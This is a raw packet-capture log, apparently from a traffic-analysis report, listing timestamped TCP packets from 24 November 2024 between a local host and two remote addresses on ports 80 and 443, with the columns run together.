                                                                                                                                                                                                Nov 24, 2024 03:04:33.366739988 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.367506981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.367624044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.367661953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.368704081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.368832111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.368882895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.369893074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.370003939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.370049000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.371103048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.371216059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.371258020 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.372292995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.372414112 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.372467995 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.373558998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.373652935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.373699903 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.374700069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.374831915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.374878883 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.375925064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.376035929 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.376084089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.377084017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.377209902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.377252102 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.378371954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.378487110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.378770113 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.379331112 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.379473925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.379587889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.379630089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.380665064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.380786896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.380832911 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.381872892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.382028103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.382072926 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.383080006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.383187056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.383232117 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.384293079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.384382010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.384434938 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.385535955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.385664940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.385710001 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.386660099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.386780977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.386823893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.387855053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.387976885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.388020992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.465610981 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.468955040 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.469007015 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.494272947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.494368076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.494467974 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.494832993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.494935989 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.495583057 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.496048927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.496150970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.496201038 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.497230053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.531230927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.531344891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.531425953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.531810999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.531862020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.531919003 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.533027887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.533086061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.533149958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.534213066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.534372091 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.534436941 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.535401106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.535597086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.535648108 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.536580086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.536709070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.536775112 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.537791014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.537915945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.537976980 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.539000988 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.539057016 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.539118052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.540179014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.540286064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.540354967 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.541368008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.541433096 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.541456938 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.542577028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.542629957 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.542649984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.543744087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.543807030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.543867111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.544972897 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.545017958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.545048952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.546144009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.546201944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.546252966 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.547327995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.547379017 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.547437906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.548536062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.548590899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.548639059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.549721956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.549777031 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.549829960 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.550935984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.550977945 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.551028967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.552133083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.552201033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.552226067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.553338051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.553384066 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.553488016 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.554544926 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.554558039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.554604053 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.555723906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.555780888 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.555819035 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.556948900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.556961060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.556998968 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.558111906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.558165073 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.558188915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.559300900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.559344053 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.559402943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.560499907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.560554981 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.560600996 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.561695099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.561750889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.561800957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.562901020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.562941074 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.562994003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.564143896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.564183950 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.564251900 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.565290928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.565336943 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.565371990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.566478968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.566529036 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.566570044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.567708015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.567769051 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.567822933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.568877935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.568922997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.568964958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.570080042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.570185900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.570250034 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.571284056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.571333885 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.571389914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.572464943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.572525024 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.572556019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.573648930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.573704958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.573762894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.574888945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.574934006 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.574954033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.576061964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.576150894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.576214075 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.577229977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.577348948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.577426910 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.578433037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.578481913 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.578541994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.579638004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.579694033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.579720020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.580852032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.580899000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.580945969 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.582046986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.582103014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.582129002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.583235979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.583340883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.583405018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.584419012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.584465027 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.584528923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.585685968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.585721016 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.585743904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.586818933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.586867094 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.586890936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.588054895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.588112116 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.588136911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.589207888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.589287996 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.589350939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.657530069 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.660866022 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.660906076 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.695565939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.695610046 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.695815086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.696131945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.696247101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.696873903 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.697308064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.697766066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.697812080 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.697869062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.732561111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.732661963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.732848883 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.733112097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.733165979 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.733196020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.734291077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.734355927 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.734695911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.734756947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.735198975 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.735944033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.736032963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.736109018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.737104893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.737237930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.737303972 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.738297939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.738394022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.738512993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.739579916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.739613056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.739660025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.740704060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.740808010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.740864992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.741885900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.741978884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.742034912 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.743124008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.743257999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.743319035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.744292974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.744393110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.744440079 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.745480061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.745543957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.745594025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.746675968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.746782064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.746834040 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.747859955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.747965097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.748023987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.749056101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.749167919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.749221087 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.750293970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.750380993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.750432014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.751439095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.751553059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.751607895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.752639055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.752742052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.752790928 CET4972980192.168.2.5185.215.113.16
